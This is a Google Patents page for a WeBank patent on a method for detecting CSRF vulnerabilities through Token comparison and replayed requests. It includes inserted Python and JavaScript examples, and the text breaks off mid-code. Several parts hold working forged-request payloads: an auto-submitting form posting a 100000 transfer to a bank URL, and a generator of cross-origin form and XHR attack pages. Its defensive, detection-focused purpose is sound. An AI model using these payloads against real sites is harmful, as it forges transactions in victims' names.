CN110113366B - CSRF vulnerability detection method and device, computing device and storage medium - Google Patents


Info

Publication number
CN110113366B
Authority
CN
China
Prior art keywords
detected
access
token
url
access request
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN201910549709.XA
Other languages
Chinese (zh)
Other versions
CN110113366A (en)
Inventor
张何钫
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
WeBank Co Ltd
Original Assignee
WeBank Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by WeBank Co Ltd
Priority to CN201910549709.XA
Publication of CN110113366A
Priority to PCT/CN2020/096900 (WO2020259389A1)
Application granted
Publication of CN110113366B
Legal status: Active (current)
Anticipated expiration

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L 63/00 Network architectures or network communication protocols for network security
    • H04L 63/08 Network architectures or network communication protocols for network security for authentication of entities
    • H04L 63/0807 Network architectures or network communication protocols for network security for authentication of entities using tickets, e.g. Kerberos
    • H04L 63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L 63/1433 Vulnerability analysis

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Information Transfer Between Computers (AREA)

Abstract

The invention discloses a CSRF vulnerability detection method and a CSRF vulnerability detection device. The method comprises the following steps: determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL site to be detected, where the first access response is returned for a first access request carrying first user login state information, the second access response is returned for a second access request carrying second user login state information, and the first user is different from the second user; if the first Token is inconsistent with the second Token, sending a third access request carrying the first user login state information to the URL site to be detected once a set time has elapsed; and if the third Token in the third access response corresponding to the third access request is consistent with the first Token, determining that the URL site to be detected has a CSRF vulnerability. The method aims to solve the problems of the prior art, in which CSRF vulnerability detection relies on a single detection means and has low detection accuracy.

Description

CSRF vulnerability detection method and device, computing device and storage medium
Technical Field
The invention relates to the technical field of financial technology (Fintech), in particular to a CSRF vulnerability detection method and device.
Background
With the development of computer technology, more and more technologies are applied in the financial field, and the traditional financial industry is gradually changing into financial technology (Fintech). The financial industry's requirements for security and real-time performance place higher demands on vulnerability detection technology.
Cross-site request forgery (CSRF) is a malicious exploitation of websites. Some financial platforms have vulnerabilities in their service functions, and CSRF lets an attacker act under the identity of a legitimate user, so that the legitimate user unknowingly triggers dangerous operations such as payments and transfers, which directly affects the security of the user's funds and accounts.
Detection methods for CSRF exist at present, but both manual detection and automated detection suffer from a single detection means and low detection accuracy.
Disclosure of Invention
The embodiment of the invention provides a detection method of a CSRF vulnerability, aiming at solving the problems of single detection means and low detection accuracy of the CSRF vulnerability in the prior art.
In a first aspect, an embodiment of the present invention provides a method for detecting a cross-site request forgery CSRF vulnerability, including:
determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL site to be detected; the first access response is returned for a first access request carrying first user login state information; the second access response is returned for a second access request carrying second user login state information; the first user is different from the second user;
if the first Token is inconsistent with the second Token, sending a third access request carrying the first user login state information to the URL site to be detected once the set time has elapsed; and if a third Token in the third access response corresponding to the third access request is consistent with the first Token, determining that the URL site to be detected has a CSRF vulnerability.
In this technical scheme, a Token comparison across different users is added to the CSRF vulnerability detection process: if the Tokens in the access responses of different users are the same, a CSRF vulnerability very probably exists. Once the Token comparison across different users has passed, a Token comparison across different time periods is performed: if the Token of the same user is the same in different time periods, a CSRF vulnerability is again likely. The scheme thus introduces Token comparison across different users and Token comparison of the same user across time periods, which enriches the Token detection means and improves detection accuracy.
In a possible implementation manner, if the third Token in the third access response returned by the server for the third access request is not consistent with the first Token, the method further includes:
constructing a fourth access request which accords with the interaction mode of the URL to be detected;
sending the fourth access request to the URL site to be detected;
if a fourth access response corresponding to the fourth access request is matched with a fifth access response, determining that the URL to be detected has a CSRF vulnerability; the fifth access response is a response of the URL to be detected to a legal access request. It should be noted that: the fourth access request may also be the first access request and thus the fifth access response may also be the first access response.
In this technical scheme, after the Token comparison across different users and the Token comparison of the same user across time periods have both passed, a further detection mode is provided that compares a constructed access request with a legitimate access request: if the response to the constructed access request matches the response to the legitimate access request (for example, the two have high similarity), it is determined that a CSRF vulnerability exists. This adds a further detection means and thereby improves detection accuracy.
In one possible implementation manner, the interaction mode of the URL site is the Ajax format, and before sending the fourth access request to the URL site to be detected, the method further includes:
setting the sender of the fourth access request to carry cookie information on cross-domain access (that is, enabling withCredentials on the request).
In this technical scheme, different access requests are constructed according to the different interaction modes, so that the CSRF vulnerability can be detected in each mode and detection accuracy is ensured.
In a possible implementation manner, before determining whether the first access identifier Token carried in the first access response returned by the URL site to be detected is consistent with the second access identifier Token carried in the second access response returned by the URL site to be detected, the method further includes:
crawling the data packets of the URL site to be detected and acquiring the first access response and the second access response from those data packets; or constructing the first access request and sending it to the URL site to be detected, and constructing the second access request and sending it to the URL site to be detected.
In this technical scheme, two ways of obtaining the access requests are provided: one is to crawl data packets from the network, so that the requests match the site's actual usage; the other is to construct the requests directly, which is more flexible.
In another possible implementation manner, before determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL page to be detected, the method further includes:
determining that the first Token and the second Token are not on a blacklist.
In this technical scheme, a blacklist check is performed before the Token comparison across different users: if a Token is on the blacklist, it is determined that the CSRF vulnerability exists; otherwise the Token comparison across different users is performed. This further improves the efficiency of CSRF vulnerability detection.
In a second aspect, an embodiment of the present invention further provides an apparatus for detecting a cross-site request forgery CSRF vulnerability, where the apparatus includes:
a determination unit, configured to determine whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL site to be detected; the first access response is returned for a first access request carrying first user login state information; the second access response is returned for a second access request carrying second user login state information; the first user is different from the second user;
a detection unit, configured to send a third access request carrying the first user login state information to the URL site to be detected when the first Token is inconsistent with the second Token and the set time has elapsed; and, if a third Token in the third access response corresponding to the third access request is consistent with the first Token, to determine that the URL site to be detected has a CSRF vulnerability.
In a possible implementation manner, the detection unit is further configured to:
constructing a fourth access request according with the interaction mode of the URL site to be detected;
sending the fourth access request to the URL site to be detected;
if a fourth access response corresponding to the fourth access request is matched with a fifth access response, determining that the URL to be detected has a CSRF vulnerability; the fifth access response is a response of the URL to be detected to a legal access request.
In a possible implementation manner, the detection apparatus further includes:
the acquisition unit is used for crawling each data packet of the URL site to be detected;
the determination unit: and further configured to determine that the first Token and the second Token are not on a blacklist.
In a third aspect, an embodiment of the present invention further provides a computing device, including:
a memory for storing program instructions;
and the processor is used for calling the program instructions stored in the memory and executing the method of the first aspect or any embodiment of the first aspect according to the obtained program.
In a fourth aspect, the present invention also provides a computer-readable non-volatile storage medium, which includes computer-readable instructions, and when the computer-readable instructions are read and executed by a computer, the computer is caused to execute the first aspect or the method of any embodiment of the first aspect.
Drawings
The accompanying drawings, which are included to provide a further understanding of the invention and are incorporated in and constitute a part of this specification, illustrate embodiments of the invention and together with the description serve to explain the invention and not to limit the invention. In the drawings:
FIG. 1 is a schematic diagram of a possible system architecture according to an embodiment of the present invention;
fig. 2 is a schematic flow chart illustrating an implementation of a method for detecting a CSRF vulnerability according to an embodiment of the present invention;
fig. 3 is a schematic diagram of a detection apparatus for CSRF vulnerability according to an embodiment of the present invention.
Detailed Description
In order to make the objects, technical solutions and advantages of the present invention more clearly understood, the present invention is further described in detail below with reference to the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative of the invention and are not intended to limit the invention.
Fig. 1 is a schematic diagram of a possible system architecture provided in the present application, as shown in fig. 1, including: a plurality of access devices 101, an access server 102. The access device 101 may be a personal computer, a mobile phone terminal, or the like, and the access server 102 provides a page access service for the user.
For each access device 101, a login operation is generally required first when accessing the access server 102. Specifically, the access device 101 sends a login request to the access server 102; the login request carries information identifying the user, typically a user name and a password. After the access server 102 verifies the login request, it sends an access response to the access device 101, which generally carries Cookie information allocated by the access server 102 to the user. The Cookie information may be stored in the browser of the access device 101 so that the user can subsequently access the access server 102 without entering login information again. However, if the site served by the access server 102 has a CSRF vulnerability, a page planted in the browser of the access device 101 can make the browser send arbitrary access requests to the access server 102, with that Cookie information attached, without the user's knowledge.
The first embodiment is as follows:
in order to detect the CSRF vulnerability, as shown in fig. 2, an embodiment of the present invention provides a method for detecting a cross-site request forgery CSRF vulnerability, including the following steps:
S11, determining a first access identifier Token carried in a first access response returned by the URL site to be detected; the first access response is returned for a first access request carrying first user login state information;
S12, determining a second Token carried in a second access response returned by the URL site to be detected; the second access response is returned for a second access request carrying second user login state information; the first user is different from the second user.
There is no precedence relationship between the step S11 and the step S12, as long as two tokens returned by two different users for the same URL site can be obtained.
S13, judging whether the first access identifier Token is consistent with the second access identifier Token or not;
S14, if the first Token is inconsistent with the second Token, sending a third access request carrying the first user login state information to the URL site to be detected once the set time has elapsed;
The set time in step S14 may be configured as needed; it should fall within the valid lifetime of the Cookie information, so that the third request is still sent in the same login state. Although the first Token is used as the example in this step, the second Token could equally serve, as long as the interval between the two accesses being compared reaches the set time.
As a concrete example, suppose a bank user queries the account balance at 10:00 a.m. and TokenA is obtained at that time. If the set time is 2 minutes and the user queries the balance or makes a transfer again at 10:03 a.m., obtaining TokenB, then TokenA and TokenB should differ.
S15, if the third Token in the third access response corresponding to the third access request is consistent with the first Token, determining that the URL site to be detected has a CSRF vulnerability. In the above embodiment, step S13 compares Tokens across different users, to catch the CSRF vulnerability that arises when different users share the same Token; step S15 compares the Tokens of the same user in different time periods, to catch the CSRF vulnerability that arises when a Token remains valid for too long.
In a possible implementation manner, taking fig. 2 as an example, after step S15, if the third Token in the third access response returned by the URL site to be detected for the third access request is not consistent with the first Token, the method further includes:
S16, constructing a fourth access request that conforms to the interaction mode of the URL site to be detected;
S17, sending the fourth access request to the URL site to be detected;
S18, if a fourth access response corresponding to the fourth access request matches a fifth access response, determining that the URL site to be detected has a CSRF vulnerability; the fifth access response is the response of the URL site to be detected to a legitimate access request.
In this implementation, a fourth access request that is similar to or identical with the legitimate access request is constructed, and its response is compared with the response to the legitimate access request; if the fourth access response matches the fifth access response, it is determined that the URL site to be detected has a CSRF vulnerability.
Take, for example, a legitimate access request that modifies published content. A fourth access request is constructed from the crawled legitimate access request; its content may be identical to that of the legitimate access request, but it is submitted from a page in a different domain rather than from the site itself. When the fourth access response is received, it is checked whether it matches the fifth access response corresponding to the legitimate access request, for instance whether the returned pages are identical or their similarity exceeds a similarity threshold; if they match, it is determined that the URL site to be detected has a CSRF vulnerability. If the URL site to be detected rejects the fourth access request, it is determined that the URL site has a defence against the CSRF vulnerability. It should be noted that the fourth access request may be the first access request of step S11, in which case the fifth access response may be the first access response.
In a possible implementation manner, taking fig. 2 as an example, before step S11, the method further includes:
Step S10, determining that the first Token and the second Token are not on a blacklist. A blacklist check is performed before the Token comparison across different users: if a crawled Token is on the blacklist, it is determined that the CSRF vulnerability exists; otherwise the Token comparison across different users is performed. This further improves the efficiency of CSRF vulnerability detection.
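Steps S10 to S18 above, collected into one decision procedure, as an added example that is not part of the patent: it takes the five captured responses as input (in a real run the third response would be fetched after the set time has elapsed, and the fourth would be the constructed request of S16 and S17 sent from a page in another domain), extracts the Token, applies the blacklist check, the cross-user and same-user-over-time comparisons, and finally the response-similarity check. The token field name csrf_token, the blacklist contents, the 0.9 similarity threshold and the sample pages are assumptions made for the example. Only the last check shows that the server actually ignores the Token; the earlier checks flag weaknesses in how the Token is issued.

```python
import difflib
import re
from typing import Dict, Optional, Tuple

# Assumption for the example: the site carries its Token in a hidden form
# field called csrf_token. A real detector takes the field name from the
# crawled page.
TOKEN_RE = re.compile(r'name="csrf_token"\s+value="([^"]*)"')

# Constructed blacklist for step S10: placeholder values that give no protection.
TOKEN_BLACKLIST = {"", "0", "null", "none", "test", "token", "csrf_token"}


def extract_token(response_body: str) -> Optional[str]:
    """Return the Token carried in an access response, or None if absent."""
    match = TOKEN_RE.search(response_body)
    return match.group(1) if match else None


def responses_match(a: str, b: str, threshold: float = 0.9) -> bool:
    """Step S18: two responses match when identical or when their
    similarity ratio reaches the threshold."""
    return a == b or difflib.SequenceMatcher(None, a, b).ratio() >= threshold


def detect_csrf(first_resp: str, second_resp: str, third_resp: str,
                fourth_resp: str, fifth_resp: str,
                threshold: float = 0.9) -> Tuple[bool, str]:
    """Apply steps S10 to S18 to five captured responses; return (vulnerable, reason).

    first_resp  - response to user A's access request (S11)
    second_resp - response to user B's access request, B != A (S12)
    third_resp  - response to user A's request after the set time (S14)
    fourth_resp - response to the constructed access request (S17)
    fifth_resp  - response to the legitimate request it imitates (S18)
    """
    t1, t2, t3 = (extract_token(r) for r in (first_resp, second_resp, third_resp))
    if t1 is not None and t2 is not None:
        if t1 in TOKEN_BLACKLIST or t2 in TOKEN_BLACKLIST:
            return True, "S10: Token is on the blacklist"
        if t1 == t2:
            return True, "S13: different users received the same Token"
        if t3 == t1:
            return True, "S15: the same user's Token did not change after the set time"
    # No Token found, or every Token check passed: fall through to the
    # constructed-request comparison of S16 to S18.
    if responses_match(fourth_resp, fifth_resp, threshold):
        return True, "S18: constructed request got the same response as the legitimate one"
    return False, "no CSRF vulnerability found by these checks"


def sample_page(token: str, balance: str = "1,000.00") -> str:
    """Constructed sample account page carrying a hidden Token field."""
    return (f'<html><body><p>Balance: {balance}</p>'
            f'<form action="/transfer.do" method="POST">'
            f'<input type="hidden" name="csrf_token" value="{token}"/>'
            f'</form></body></html>')


# Three constructed scenarios (not captured from any real site).
SCENARIOS: Dict[str, Dict[str, str]] = {
    # One static Token handed to everybody: fails at S13.
    "static": dict(first_resp=sample_page("abc123"), second_resp=sample_page("abc123"),
                   third_resp=sample_page("abc123"), fourth_resp=sample_page("abc123"),
                   fifth_resp=sample_page("abc123")),
    # Per-user Token that rotates, but the server never validates it: fails at S18.
    "unchecked": dict(first_resp=sample_page("u1-t0"), second_resp=sample_page("u2-t0"),
                      third_resp=sample_page("u1-t1"), fourth_resp=sample_page("u1-t1"),
                      fifth_resp=sample_page("u1-t1")),
    # Rotating Token and the constructed request is rejected: passes all checks.
    "hardened": dict(first_resp=sample_page("u1-t0"), second_resp=sample_page("u2-t0"),
                     third_resp=sample_page("u1-t1"),
                     fourth_resp='<html><body><h1>403 Forbidden</h1>'
                                 '<p>invalid csrf token</p></body></html>',
                     fifth_resp=sample_page("u1-t1")),
}


def run_examples() -> Dict[str, Tuple[bool, str]]:
    """Run the detector over every constructed scenario."""
    return {name: detect_csrf(**responses) for name, responses in SCENARIOS.items()}


if __name__ == "__main__":
    for name, verdict in run_examples().items():
        print(f"{name:10s} vulnerable={verdict[0]!s:5s} {verdict[1]}")
```

The similarity ratio stands in for the "returned page consistent or similarity above a threshold" test of S18; in practice the threshold is tuned on the site, since dynamic page content (timestamps, nonces) lowers the ratio between two legitimate responses.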
For the first access response in step S11 and the second access response in step S12, the following two possible implementations are provided.
The first method: crawling the data packets of the URL site to be detected, and acquiring the first access response and the second access response from those data packets;
The second method: constructing the first access request and sending it to the URL site to be detected; and constructing the second access request and sending it to the URL site to be detected.
In general, a more effective and concise detection mode can be built by obtaining users' historical access information through web crawling. For example, in steps S11 and S12 the crawled Token information of different users may be compared, and the Tokens of many users on the network may be compared at the same time, which further improves the accuracy of the detection means.
Existing CSRF vulnerability detection modes basically submit access requests in Form format; however, a site to be detected may expect request bodies in JSON or XML format, which a Form submission cannot provide, so such access requests cannot be produced in Form format. For this reason the CSRF vulnerability detection method here constructs access requests according to the different formats used by the site to be detected. Specifically, the following two implementation manners are provided for constructing, in step S16, the fourth access request that conforms to the interaction mode of the URL site to be detected.
In general, whether the access request is in Form format can be judged from the form tag in the crawled page code. The following code 1 is a legitimate access request, recognisable as a Form-format access request by its form tag:
<form action="action_page.php">
First name:<br>
<input type="text" name="firstname" value="Mickey">
<br>
Last name:<br>
<input type="text" name="lastname" value="Mouse">
<br><br>
<input type="submit" value="Submit">
</form>
If the access request is in Form format, the fourth access request is constructed by placing a copy of the form in a local HTML file and replacing the name and value attributes of its <input> elements; the following code 2 is an example:
<body onload="document.forms[0].submit()">
<form action="http://bank.com/transfer.do" method="POST">
<input type="hidden" name="acct" value="MARIT"/>
<input type="hidden" name="amount" value="100000"/>
<input type="submit" name="View my picture"/>
</form>
</body>
Whether the CSRF vulnerability exists is then determined by comparing the fifth access response corresponding to the legitimate access request of code 1 with the fourth access response corresponding to this fourth access request.
Whether the access request is made in the Ajax interaction mode is judged from the Ajax call (typically an XMLHttpRequest) in the crawled page code. If the submission is judged to use the Ajax interaction mode, the fourth access request is constructed as an Ajax request in which the data passed to send() is replaced. An example of Ajax interaction is the following code 3:
(Code 3 appears in the original document only as an image and is not reproduced here.)
In this detection mode, if the constructed request is sent in the Ajax interaction mode, the browser checks whether the page issuing the request and the server are in the same domain. If they are not, the request is cross-domain, and the withCredentials property of the sender must be set to true so that cookie information is carried on the cross-domain access. In other words, the browser of the access device 101 needs to be set to carry cookie information on cross-domain access for the detection process described above to work. A tester should also keep in mind that the browser only completes such a cross-domain Ajax request, and only lets the page read its response, if the server's CORS response headers allow that origin with credentials; a Form submission is not subject to this check.
A cross-domain request is one in which the domain of the page that initiates the request differs from the domain of the resource the request points to; two URLs are in the same domain only if the protocol, domain name and port number all match.
If the request is submitted as a constructed Form, the browser of the access device 101 does not check whether its own domain matches the domain of the site to be detected and simply sends the request out, so the browser does not need to be set to support cross-domain requests.
When the request is constructed in the Ajax interaction mode, however, the browser of the access device 101 checks whether its own domain matches the domain of the site to be detected; a browser in a different domain cannot send the request unless it is set to support the cross-domain request.
In the technical scheme, different access requests are constructed according to different message formats, so that the detection of the CSRF vulnerability can be realized, and the detection accuracy is ensured.
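The two construction modes of step S16, as an added JavaScript example that is not part of the patent: parseCrawledForm recovers action and fields from a crawled form such as code 1, buildFormPoc produces the auto-submitting page of code 2 with chosen name/value pairs replaced, and planAjaxRequest with buildAjaxPoc produce the Ajax variant, setting withCredentials whenever the detector's page and the target are not in the same domain (protocol, host and port). The hosts bank.example and attacker.example, the acct/amount fields and the JSON body are assumptions. The plan also records whether the browser will preflight the request: a cross-domain Ajax request with a JSON or XML body is sent only after a preflight that the target's CORS headers must answer favourably, whereas the Form submission goes out without any such check, which is why the two modes have to be built separately.

```javascript
// Added example: build the "fourth access request" of step S16 in the Form
// and Ajax interaction modes. Hosts, field names and body are assumptions.

const SIMPLE_CONTENT_TYPES = [
  'application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain',
];

// Escape a value for use inside a double-quoted HTML attribute.
const escapeAttr = (s) => String(s)
  .replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;');

// Read one double-quoted attribute out of a tag's text (case-insensitive).
function attr(tagText, name) {
  const m = tagText.match(new RegExp('\\b' + name + '\\s*=\\s*"([^"]*)"', 'i'));
  return m ? m[1] : null;
}

// Recover action, method and name/value pairs from a crawled <form> (code 1
// style). Submit buttons are skipped: a scripted form.submit() does not send them.
function parseCrawledForm(html) {
  const form = html.match(/<form\b([^>]*)>([\s\S]*?)<\/form>/i);
  if (!form) return null;
  const fields = {};
  for (const tag of form[2].match(/<input\b[^>]*>/gi) || []) {
    const name = attr(tag, 'name');
    if (name && (attr(tag, 'type') || 'text').toLowerCase() !== 'submit') {
      fields[name] = attr(tag, 'value') || '';
    }
  }
  return {
    action: attr(form[1], 'action') || '',
    method: (attr(form[1], 'method') || 'GET').toUpperCase(),
    fields,
  };
}

// "Same domain" in the patent's sense: protocol, host name and port all equal
// (the URL parser reports a default port as an empty string, so :80 matches).
function isSameOrigin(urlA, urlB) {
  const a = new URL(urlA), b = new URL(urlB);
  return a.protocol === b.protocol && a.hostname === b.hostname && a.port === b.port;
}

// Form mode: an auto-submitting copy of the legitimate form (code 2) with the
// chosen name/value pairs replaced.
function buildFormPoc(action, fields, overrides = {}) {
  const merged = { ...fields, ...overrides };
  const inputs = Object.entries(merged).map(([n, v]) =>
    `  <input type="hidden" name="${escapeAttr(n)}" value="${escapeAttr(v)}"/>`);
  return [
    '<body onload="document.forms[0].submit()">',
    `<form action="${escapeAttr(action)}" method="POST">`,
    ...inputs,
    '</form>',
    '</body>',
  ].join('\n');
}

// Ajax mode: describe the XMLHttpRequest the detector page will issue.
// withCredentials is needed only when page and target are cross-domain; a
// non-simple content type (JSON, XML) makes the browser preflight the request.
function planAjaxRequest(pageUrl, targetUrl, body, contentType = 'application/json') {
  const crossOrigin = !isSameOrigin(pageUrl, targetUrl);
  return {
    method: 'POST',
    url: targetUrl,
    contentType,
    body: typeof body === 'string' ? body : JSON.stringify(body),
    withCredentials: crossOrigin,
    preflighted: crossOrigin && !SIMPLE_CONTENT_TYPES.includes(contentType),
  };
}

// Emit the script that performs the planned request from the detector page,
// replacing the data passed to send() as the patent describes.
function buildAjaxPoc(plan) {
  return [
    '<script>',
    'var xhr = new XMLHttpRequest();',
    `xhr.open(${JSON.stringify(plan.method)}, ${JSON.stringify(plan.url)}, true);`,
    `xhr.withCredentials = ${plan.withCredentials};`,
    `xhr.setRequestHeader("Content-Type", ${JSON.stringify(plan.contentType)});`,
    'xhr.onload = function () { document.title = "status " + xhr.status; };',
    `xhr.send(${JSON.stringify(plan.body)});`,
    '</script>',
  ].join('\n');
}

// Constructed sample of a crawled legitimate form (not taken from a real site).
const CRAWLED_FORM = [
  '<form action="http://bank.example/transfer.do" method="POST">',
  '<input type="hidden" name="acct" value="ALICE">',
  '<input type="hidden" name="amount" value="10">',
  '<input type="submit" value="Transfer">',
  '</form>',
].join('\n');

function demo() {
  const legit = parseCrawledForm(CRAWLED_FORM);
  const formPoc = buildFormPoc(legit.action, legit.fields, { acct: 'MARIT', amount: '100000' });
  const plan = planAjaxRequest('http://attacker.example/poc.html',
    'http://bank.example/api/transfer', { acct: 'MARIT', amount: 100000 });
  return { legit, formPoc, plan, ajaxPoc: buildAjaxPoc(plan) };
}

if (typeof require !== 'undefined' && require.main === module) {
  const d = demo();
  console.log(d.formPoc + '\n\n' + d.ajaxPoc);
}
```

Either generated page is loaded in a browser on the access device that already holds the target's cookie, and the response it receives is the fourth access response compared in step S18.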
Based on the same inventive concept, the embodiment of the present invention further provides a device for detecting a cross-site request forgery CSRF vulnerability, and because the principle of solving the problem by the device is similar to that of the method for detecting the cross-site request forgery CSRF vulnerability, the implementation of the device can refer to the implementation of the method, and repeated parts are not described again.
As shown in fig. 3, a schematic structural diagram of a detection apparatus for CSRF vulnerability according to a second embodiment of the present invention includes: a determination unit 32 and a detection unit 33, wherein:
a determination unit, configured to determine whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL site to be detected; the first access response is returned for a first access request carrying first user login state information; the second access response is returned for a second access request carrying second user login state information; the first user is different from the second user;
a detection unit, configured to send a third access request carrying the first user login state information to the URL site to be detected when the first Token is inconsistent with the second Token and the set time has elapsed; and, if a third Token in the third access response corresponding to the third access request is consistent with the first Token, to determine that the URL site to be detected has a CSRF vulnerability.
Further, the detection unit is further configured to:
constructing a fourth access request which accords with the interaction mode of the URL to be detected;
sending the fourth access request to the URL site to be detected;
if a fourth access response corresponding to the fourth access request is consistent with a fifth access response, determining that the URL site to be detected has a CSRF vulnerability; the fifth access response is a response of the URL to be detected to a legal access request.
In specific implementation, the detection device further includes:
the acquiring unit 31 is configured to crawl each data packet of the URL site to be detected;
the determination unit: and further configured to determine that the first Token and the second Token are not on a blacklist.
The cross-site request forgery CSRF detection apparatus provided by the above embodiments of the present application can be implemented by a computer program. Those skilled in the art should understand that the module division above is only one of many possible divisions; dividing the functions into other modules, or not dividing them at all, remains within the scope of the present application as long as the CSRF detection apparatus has the functions described above.
Based on the same inventive concept, an embodiment of the present invention further provides a computer device, including:
a memory for storing program instructions;
and the processor is used for calling the program instructions stored in the memory and executing the detection method of the CSRF loophole in the embodiment according to the obtained program.
Based on the same inventive concept, an embodiment of the present invention further provides a computer-readable non-volatile storage medium, which includes computer-readable instructions, and when the computer reads and executes the computer-readable instructions, the computer is caused to execute the method for detecting a CSRF vulnerability in the foregoing embodiment. As will be appreciated by one skilled in the art, embodiments of the present application may be provided as a method, system, or computer program product. Accordingly, the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, the present application may take the form of a computer program product embodied on one or more computer-usable storage media (including, but not limited to, disk storage, CD-ROM, optical storage, and the like) having computer-usable program code embodied therein.
The present application is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems), and computer program products according to the application. It will be understood that each flow and/or block of the flowchart illustrations and/or block diagrams, and combinations of flows and/or blocks in the flowchart illustrations and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded processor, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
It will be apparent to those skilled in the art that various changes and modifications may be made in the present application without departing from the spirit and scope of the application. Thus, if such modifications and variations of the present application fall within the scope of the claims of the present application and their equivalents, the present application is intended to include such modifications and variations as well.

Claims (10)

1. A method for detecting a cross-site request forgery (CSRF) vulnerability, the method comprising:
determining whether a first access identifier (Token) carried in a first access response returned by the URL site to be detected is consistent with a second access identifier (Token) carried in a second access response returned by the URL site to be detected; the first access response is returned for a first access request carrying first user login state information; the second access response is returned for a second access request carrying second user login state information; the first user is different from the second user;
if the first Token is inconsistent with the second Token, sending a third access request carrying the first user login state information to the URL site to be detected when a set time is up;
and if a third Token in a third access response corresponding to the third access request is consistent with the first Token, determining that the URL site to be detected has a CSRF vulnerability.
2. The method as claimed in claim 1, wherein, if the third Token in the third access response corresponding to the third access request is inconsistent with the first Token, the method further comprises:
constructing a fourth access request which conforms to the interaction mode of the URL site to be detected;
sending the fourth access request to the URL site to be detected;
if a fourth access response corresponding to the fourth access request is the same as a fifth access response, determining that the URL site to be detected has a CSRF vulnerability; the fifth access response is the response of the URL site to be detected to a legal access request.
3. The detection method according to claim 2, wherein the interaction mode of the URL site to be detected is Asynchronous JavaScript and XML (Ajax);
and before sending the fourth access request to the URL site to be detected, the method further comprises:
setting the sender of the fourth access request to carry cookie information when cross-domain access is supported.
4. The detection method according to claim 1, further comprising, before determining whether the first Token carried in the first access response returned by the URL site to be detected is consistent with the second Token carried in the second access response returned by the URL site to be detected:
crawling each data packet of the URL site to be detected, and acquiring the first access response and the second access response from the data packets; or
constructing the first access request and sending it to the URL site to be detected, and constructing the second access request and sending it to the URL site to be detected.
5. The detection method according to claim 1, further comprising, before determining whether the first Token carried in the first access response returned by the URL site to be detected is consistent with the second Token carried in the second access response returned by the URL site to be detected:
determining that the first Token and the second Token are not on a blacklist.
6. An apparatus for detecting a cross-site request forgery (CSRF) vulnerability, the apparatus comprising:
a determination unit, configured to determine whether a first access identifier (Token) carried in a first access response returned by the URL site to be detected is consistent with a second access identifier (Token) carried in a second access response returned by the URL site to be detected; the first access response is returned for a first login request carrying first user login state information; the second access response is returned for a second access request carrying second user login state information; the first user is different from the second user;
a detection unit, configured to send a third access request carrying the first user login state information to the URL site to be detected when the first Token is inconsistent with the second Token and a set time is up; and, if a third Token in a third access response corresponding to the third access request is consistent with the first Token, to determine that the URL site to be detected has a CSRF vulnerability.
7. The detection apparatus of claim 6, wherein the detection unit is further configured to:
construct a fourth access request which conforms to the interaction mode of the URL site to be detected;
send the fourth access request to the URL site to be detected;
and, if a fourth access response corresponding to the fourth access request is the same as a fifth access response, determine that the URL site to be detected has a CSRF vulnerability; the fifth access response is the response of the URL site to be detected to a legal access request.
8. The detection apparatus of claim 6, further comprising:
an acquisition unit, configured to crawl each data packet of the URL site to be detected;
the determination unit being further configured to determine that the first Token and the second Token are not on a blacklist.
9. A computing device, comprising:
a memory for storing program instructions;
a processor for calling the program instructions stored in the memory and executing the method of any one of claims 1 to 5 according to the obtained program.
10. A computer-readable non-transitory storage medium comprising computer-readable instructions which, when read and executed by a computer, cause the computer to perform the method of any one of claims 1 to 5.
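
The decision procedure of claims 1, 2 and 5, as an added example that is not part of the patent or of the applicant's code: a constructed Python mock (`MockSite`) stands in for the "URL site to be detected", and `detect_csrf` walks the claimed steps against it. The class and function names, the blacklist contents, the mock's three token behaviours and the way the fourth request is built (the site's own submit path with the session cookie but no Token) are assumptions made for illustration; the branch for two users receiving the same Token is the example's own choice, since the claims only define what happens when the Tokens differ.

```python
# Added example (not the patent's own code): the decision logic of claims 1, 2 and 5
# exercised against a constructed mock of the "URL site to be detected".
import time
from dataclasses import dataclass, field
from typing import Optional

# Claim 5: values that look like a Token but are not real CSRF tokens.
# Constructed list for this example.
TOKEN_BLACKLIST = {"", "null", "undefined", "None"}


@dataclass
class MockSite:
    """Constructed stand-in for the site under test (assumption, not a real target).

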